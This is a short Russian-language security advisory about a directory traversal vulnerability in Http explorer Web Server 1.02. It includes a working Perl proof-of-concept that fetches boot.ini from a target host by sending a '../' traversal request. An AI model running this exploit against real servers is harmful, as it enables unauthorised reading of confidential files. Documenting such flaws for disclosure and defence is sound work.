• Партнер

  • Программа: Http explorer Web Server 1.02

    Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, в Web сервере, приводящей к возможности использования спцификаторов обхода директорий для получения содержимого произвольных файлов.

    Пример:

    # Http explorer Web Server 1.02 Directory Transversal Vulnerability
    # http://sourceforge.net/projects/http-explorer/
    # Test: http://[site]/../../../../ || http://[site]/../
    # /str0ke

    use LWP::Simple;
    use strict;

    sub usage
    {
    print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
    print "str0ke (milw0rm.com)\n";
    print "Usage: $0 www.example.com\n";
    exit ();
    }

    my $host= shift || &usage;

    getprint "http://" . $host . "/../../../../../../../../boot.ini";

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии